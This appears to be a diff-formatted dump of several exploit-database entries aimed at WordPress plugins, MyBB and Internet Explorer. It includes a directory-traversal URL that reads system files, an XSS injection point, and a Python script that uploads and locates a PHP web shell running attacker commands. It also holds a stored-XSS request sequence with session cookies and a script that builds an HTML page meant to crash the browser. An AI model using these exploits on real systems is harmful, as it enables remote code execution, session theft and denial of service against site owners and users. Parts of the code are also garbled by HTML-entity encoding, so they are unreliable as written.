+The WP Publication Archive Plugin for WordPress is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
+
+An attacker can exploit this issue to download arbitrary files from the affected application. This may allow the attacker to obtain sensitive information; other attacks are also possible.
+
+WP Publication Archive 2.0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/wp-publication-archive/includes/openfile.php?file=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../windows/win.ini 

platforms/php/webapps/35264.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46001/info
+
+The Featured Content plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Featured Content 0.0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/x7host-videox7-ugc-plugin/x7listplayer.php?listid=[xss] 

platforms/php/webapps/35265.php

@@ -0,0 +1,60 @@
+source: http://www.securityfocus.com/bid/46002/info
+
+WordPress Recip.ly is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+WordPress Recip.ly 1.1.7 and prior versions are vulnerable. 
+
+import socket
+
+host = 'localhost'
+path = '/wordpress'
+shell_path = path + '/wp-content/plugins/reciply/images/shell.php'
+port = 80
+
+def upload_shell():
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    s.settimeout(8)    
+
+    s.send('POST ' + path + '/wp-content/plugins/reciply/uploadImage.php HTTP/1.1\r\n'
+           'Host: localhost\r\n'
+           'Proxy-Connection: keep-alive\r\n'
+           'User-Agent: x\r\n'
+           'Content-Length: 195\r\n'
+           'Cache-Control: max-age=0\r\n'
+           'Origin: null\r\n'
+           'Content-Type: multipart/form-data; boundary=----x\r\n'
+           'Accept: text/html\r\n'
+           'Accept-Encoding: gzip,deflate,sdch\r\n'
+           'Accept-Language: en-US,en;q=0.8\r\n'
+           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
+           'Content-Type: application/octet-stream\r\n'
+           '\r\n'
+           &#039;<?php echo \&#039;<pre>\&#039; + system($_GET[\&#039;CMD\&#039;]) + \&#039;</pre>\&#039;; ?>\r\n&#039;
+           &#039;------x--\r\n&#039;
+           &#039;\r\n&#039;)
+
+    resp = s.recv(8192)
+
+    http_ok = &#039;HTTP/1.1 200 OK&#039;
+    
+    if http_ok not in resp[:len(http_ok)]:
+        print &#039;error uploading shell&#039;
+        return
+    else: print &#039;shell uploaded&#039;
+
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    s.settimeout(8)  
+    s.send(&#039;GET &#039; + shell_path + &#039; HTTP/1.1\r\n&#039;\
+           &#039;Host: &#039; + host + &#039;\r\n\r\n&#039;)
+
+    if http_ok not in s.recv(8192)[:len(http_ok)]: print &#039;shell not found&#039;        
+    else: print &#039;shell located at http://&#039; + host + shell_path
+
+upload_shell()

platforms/php/webapps/35266.txt

@@ -0,0 +1,105 @@
+*# Exploit Title*:[Stored XSS vulnerability in MyBB 1.8.2
+*# Date:* 16th November'2014
+*# Exploit Author:* Avinash Kumar Thapa
+*# Vendor Homepage:* http://www.mybb.com/
+*# Software Link*: http://www.mybb.com/download/
+*# Version:* MyBB 1.8.2 (latest)
+*# Tested on:*
+   * Operating System*: Windows 8.1
+   * Browser Used* : Mozilla Firefox 33.1  (localhost)
+####################################################################################
+
+The latest version of MyBB forums(1.8.2) is vulnerable to Stored Cross-Site
+Scripting(XSS) vulnerability and Complete Proof of Concept is shown below:
+
+*Stored XSS:*
+
+*Step1: * Create a user account and go to *User CP >Edit Profile > **Custom
+User Title*
+
+*Vector Used : <img src=x onerror=alert('XSS');>*
+
+*Post Request*
+
+ *POST /fuck/Upload/usercp.php HTTP/1.1*
+*Host: localhost*
+*User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101
+Firefox/33.0*
+*Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8*
+*Accept-Language: en-US,en;q=0.5*
+*Accept-Encoding: gzip, deflate*
+*Referer: http://localhost/fuck/Upload/usercp.php?action=profile
+<http://localhost/fuck/Upload/usercp.php?action=profile>*
+*Cookie: adminsid=d926efdecaa86cdba516a78abef57b47; acploginattempts=0;
+mybb[lastvisit]=1416124581; mybb[lastactive]=1416126977; mybb[referrer]=1;
+loginattempts=1; sid=c1ec3cf334b129e0f7e58f9ca9971aeb;
+mybbuser=2_FWzmPOn8tKQhMm2urQwtHHx3iAJDWoB5kbyjjB2xwmbTXPpeAx*
+*Connection: keep-alive*
+*Content-Type: application/x-www-form-urlencoded*
+*Content-Length: 382*
+
+*my_post_key=6fa6202df4adac5d50bd19b0c1204992&bday1=&bday2=&bday3=&birthdayprivacy=all&website=http%3A%2F%2F&profile_fields%5Bfid1%5D=&profile_fields%5Bfid2%5D=&profile_fields%5Bfid3%5D=Undisclosed&usertitle=%3Cimg+src%3Dx+onerror%3Dalert%28%27XSS%27%29%3B%3E&icq=&aim=&yahoo=&skype=&google=&away=0&awayreason=&awayday=&awaymonth=&awayyear=&action=do_profile®submit=Update+Profile*
+
+*Step 2: Go to http://localhost/fuck/upload/calendar.php
+<http://localhost/fuck/upload/calendar.php>*
+*Step 3: Create any event on any date and click on event.*
+
+*REQUEST*
+
+*GET /fuck/Upload/calendar.php?action=event&eid=9 HTTP/1.1*
+*Host: localhost*
+*User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101
+Firefox/33.0*
+*Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8*
+*Accept-Language: en-US,en;q=0.5*
+*Accept-Encoding: gzip, deflate*
+*Referer: http://localhost/fuck/Upload/calendar.php
+<http://localhost/fuck/Upload/calendar.php>*
+*Cookie: adminsid=d926efdecaa86cdba516a78abef57b47; acploginattempts=0;
+mybb[lastvisit]=1416124581; mybb[lastactive]=1416126977; mybb[referrer]=1;
+loginattempts=1; sid=c1ec3cf334b129e0f7e58f9ca9971aeb;
+mybbuser=2_FWzmPOn8tKQhMm2urQwtHHx3iAJDWoB5kbyjjB2xwmbTXPpeAx*
+*Connection: keep-alive*
+
+*RESPONSE:*
+
+HTTP/1.1 200 OK
+Date: Sun, 16 Nov 2014 09:37:46 GMT
+Server: Apache/2.4.10 (Win32) OpenSSL/1.0.1i PHP/5.5.15
+X-Powered-By: PHP/5.5.15
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+Content-Length: 11336
+
+[SNIP]
+
+<strong><span class="largetext"><a href="
+http://localhost/fuck/Upload/member.php?action=profile&uid=3">avinash</a></span></strong><br
+/>
+<span class="smalltext">
+<img src=x onerror=alert('XSS');><br />
+<img src="images/star.png" border="0" alt="*" /><img src="images/star.png"
+border="0" alt="*" /><img src="images/star.png" border="0" alt="*" /><img
+src="images/star.png" border="0" alt="*" /><img src="images/star.png"
+border="0" alt="*" /><br />
+</span>
+</div>
+<div class="float_right" style="text-align: right;">
+
+
+[snip]
+
+Only XSS response is shown here :) not complete response to avoid junk :)
+
+*Recommendation: *Upgrade MyBB 1.8.2  :)
+
+
+*By:*
+*Avinash Kumar Thapa  a.k.a "-Acid" or "SPID3R"*
+
+*Twitter: * https://twitter.com/m_avinash143
+Facebook:https://www.facebook.com/M.avinash143
+
+That's all for the day
+Enjoy

platforms/windows/dos/35202.py

@@ -0,0 +1,17 @@
+# Exploit Title: [ IE D.O.S ]
+# Date: [10/28/2014]
+# Exploit Author: [Behrooz Abbassi]
+# Vendor Homepage: [http://microsoft.com]
+# Software Link: [http://windows.microsoft.com/en-us/internet-explorer/download-ie]
+# Version: [tested on 8 to 11]
+# Tested on: [XP to 8.1 x64/x86]
+
+FuckIE="""<!DOCTYPE html>\n<html>\n<head><title>IE D.O.S</title>\n</head>\n<body>\n %s </body>\n</html>\n"""
+
+rubbish  = """	<div class="First"><div class="Two"/> :-)<div class="Three"> </div>\n""" * 1021
+
+IE_DOS =FuckIE %rubbish
+
+file = open("IE_DOS.html", "w")
+file.write(IE_DOS)
+file.close()